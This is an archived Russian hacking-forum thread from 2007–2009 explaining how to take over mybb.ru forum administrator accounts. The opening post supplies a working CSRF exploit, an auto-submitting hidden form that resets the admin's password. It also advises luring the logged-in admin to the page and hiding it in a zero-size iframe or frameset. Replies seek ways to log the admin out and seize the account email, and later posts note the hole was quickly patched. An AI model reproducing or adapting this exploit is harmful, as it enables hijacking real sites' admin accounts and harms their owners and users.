Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   ОПИСАНИЕ ВЗЛОМА Mybb ФОРУМОВ (https://forum.antichat.xyz/showthread.php?t=30661)

consul 06.01.2007 01:14
ОПИСАНИЕ ВЗЛОМА Mybb ФОРУМОВ
 
Почитал форум и обнаружил толпу людей, интересующихся вопросом как взломать форум mybb. Ниже я опишу пару абсолютно новых найденных мной уязвимостей, действующих на 1bb, 2bb, 3bb, 4bb и 5bb. На форумы типа http://"называние форума".mybb.ru/ также можно взламывать прочитав эту статейку. Уязвимости возможно действуют так же и в остальных версиях mybb и punbb потому что они все однотипны.

1) Если тебе необходимо взломать форум, не торопсись, сначала всё обдумай, осмотрись. Для начала ты должен зарегестрироваться, найти администратора форума. Теперь, можно приступать к главной цели - взлому.

2) Формы. Дело в том что для каждого ресурса где есть какие-либо формы(поля) куда можно вбивать запросы, есть возможность сделать лже-форму, с другими данными именами и атрибутами, или же просто скопировать оригинал.

3) Чем тебе помогут эти самые формы: В форумах mybb при изменении пароля через профиль юзевера(админа) нет проверки текущего(старого) пароля. Это означает, что ты можешь сделать лже-форму и вбить в неё новые значения переменных, в данном случае это req_new_password1 и req_new_password2. Первая просит ввести новый пароль, а вторая требует подтвердить его. Следовательно, создаём страничку с содержанием следущего кода:

Код:
<script lang=javascript>
  function hackedforum () {
document.hacked.submit();
  }
</script>
<body onload="hackedforum()">
<form method="post" name="hacked" action="http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&amp;id=2">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="req_new_password1" value="your_password">
<input type="hidden" name="req_new_password2" value="your_password">
</form>
4) Эту страничку ты должен впарить администратору форума, причём в тот момент, когда он авторизован. Теперь вооружившись уязвимостью и своей головой, иди и ломай форумы mybb которые тебе нужны. Да! Не стойте на месте, думайте как ещё можно использовать эту уязвимость, благо настройки администратора не оканчиваются только на смене пароля, можете создавать другие лже-формы. Свой форум mybb можно зарегестрировать за одну минуту по адресу http://mybb.ru/new.php на нём и тестируйте, попробуйте изменить настройки форума, права групп и т.д, вообщем перспектива огромная ;-)

---------------------------------------------------------
Специально для сайта Античат, ваш Consul.

Asp1r1n 06.01.2007 01:59
Вопрос может глупый, как можно создать страничку с этим кодом?

consul 06.01.2007 02:27
Несомненно, вопрос глупый. Создай у себя на винте, к примеру на рабочем столе файл index.html и вбей в него данный код. Подредактируй под себя(измени пароль, впиши адрес форума), залей куда-нибудь и давай линку администратору форума. Можно сделать скрыто, чтоб было без палева. Например пихнуть код в ифрейм, а его размер сделать нулевым. Должно быть понятно.

Zloba / не понимаю, что именно тебя напрягает, форум ломается за 5 минут, понятно даже детям /

consul 06.01.2007 03:04
да...что непонятно спрашивайте прямо здесь.

Asp1r1n 06.01.2007 03:21
http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&amp;id=2 у тебя написно, что адрес смены пароля тут, но в myBB он находиться по этому адресу http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&id=ТутНмерЮ зера.

Я еще совсем зеленый в этих делах. Если не трудно хелпни мне по асе 7575552

consul 06.01.2007 03:33
Да-да...разумеется в id=2 можно указать номер любого пользователя, чтобы узнать номер пользователя щёлкни в его профиль и посмотри в адресной строке.

Asp1r1n 06.01.2007 03:50
Это естественно понятно. Я создал такой файл. Он работает, но одно но, он естественно палицца, идет загрузка файла, он меняет пасс, затем выскакивет окошко пароль удачно изменет и перекидывает на админскую страничку смены пароля. Так вот вопрос, как сделать, что б скрипт не палился, и после смены перебрасывал на другую страничку, а если админ не авторизаван или зашел не админ тоже перебрасывало на другую странику без запала, а то идет сообщение типа у вас нет прав на доступ.
И мелкие пожелания, если навести мышкой на эту страницу, то паказывает совсем другую ссылку, например навел на зловредную ссылку, а там гугл.ком, всемто хак.хтмл? (но это думаю не сложно сам найду)
Надеюсь я не слишком требователен =))

.Slip 06.01.2007 04:03
Ну да.. И бегать за админом с этой ссылкой.. А если он не захочет пасс менять, то что тогда?=] Вообще такого вида фейк не рулит.

consul 06.01.2007 04:18
1) Бегать за админом не нужно, достаточно куда-нибудь выложить этот скрипт и вставить ещё на одну страничку используя ифрэйм(даже необязательно). Админа мы спрашивать не будем хочет изменять он пасс или нет.

2) Это уязвимость не из раздела Фэйк. В Фэйке пользователь сам вводит свой логин и пароль, то есть это копия оригинала. Тут мы изменяем значение переменной.

Asp1r1n 06.01.2007 04:38
consul
Вопрос такой:
Как сделать скрипт, что бы делал такую штуку:
Вушеуказанный, т.е. смена паролья у аднима (id=2)
Затем сразу автоматом выход админа с форума...
Пока будет думать, что призошло можно быстро зайти под его учеткой и сметить мыло, чтоб он не смог восстановить пасс, вот еще мыло если автоматом будет на наше вообще блеск.

Сейчас важно как выгнать админа с форума в одним и тем же скриптом???

consul 06.01.2007 04:52
Попробуй вставить через ифрейм...создай ещё одну страничку и запихни туда такой код:

Код:
<frameset cols="0%,100%">
<frame src="index.html">
</frameset>
Где index.html - адрес до странички с кодом. Если не получится, говори, придумаю ещё что-нибудь.

izerli 06.01.2007 23:47
Даа...идейка интересная у меня как раз щас задача поломать один из таких форумов,
НО , тэстил на сибе выдает следущее :::
----------------------------------------------------
Информация
Неверный источник. Вы попали на эту страницу из несанкционированного источника. Пожалуйста, вернитесь и попробуйте еще раз.
------------------------------------------------------
Так что вот так ,Ваши предложения???

.Slip 07.01.2007 00:04
Не прокатит это больше:)

Asp1r1n 07.01.2007 01:50
БЛИН, только вчера работало! Сегодня тоже протестил на себе. Не прокатило :(((

Это шустро прикрыли, ББшники млин. Это они каждый форум апгрейтили выходит дело?, во им делать нечего.
[sL1p] Есть еще способы?

.Slip 07.01.2007 01:56
Цитата:
Это они каждый форум апгрейтили выходит дело?, во им делать нечего.
Нет=) Ты думаешь это так делается? Форумы то клоны, просто с настраиваемой внешней оболочкой. Админ изменяет что то у себя в главной админке, меняется на всех форумах. Так на всех беспл. хостингах.
Цитата:
[sL1p] Есть еще способы?
Может быть и есть, но я их не знаю:)

Asp1r1n 07.01.2007 02:05
Вот чОрт. Значит тема не актуальна. Можно закрывать...

consul 07.01.2007 04:12
мда. выкладываешь в паблик а через 10 часов админы уже прикрывают...жаль...

GreenBear 07.01.2007 04:14
Цитата:
мда. выкладываешь в паблик а через 10 часов админы уже прикрывают...жаль...
а ты думал.

izerli 07.01.2007 18:38
Ооочень жалько,....надо искать другие пути.

MyBB 08.01.2007 00:54
Цитата:
Сообщение от izerli
Ооочень жалько,....надо искать другие пути.
Не забудьте выложить в паблик, если что-то найдете ;+))

JCD333 23.12.2008 18:02
До сих пор так и не понял: как создать страничку с этим кодом? И вообще можно этот код себе в блог залить и дать на него ссылку админу??
P.S. Извините за глупые вопросы,я чайник,но очень хочу взломать форум mybb!

Shadow6120 17.01.2009 12:27
Хм, а может там есть что-то вроде редикрета? Или это тоже не сработает?

Artemik 18.01.2009 18:17
consul

а вот в системе UcoZ.ru ненадо вспоминать старый пароль. (попробуйте зарегать себе сайт на Укоз и убедиться в этом)

Только у меня с пост запросами туго)))
Может ты что то сможешь сделать?


Время: 19:46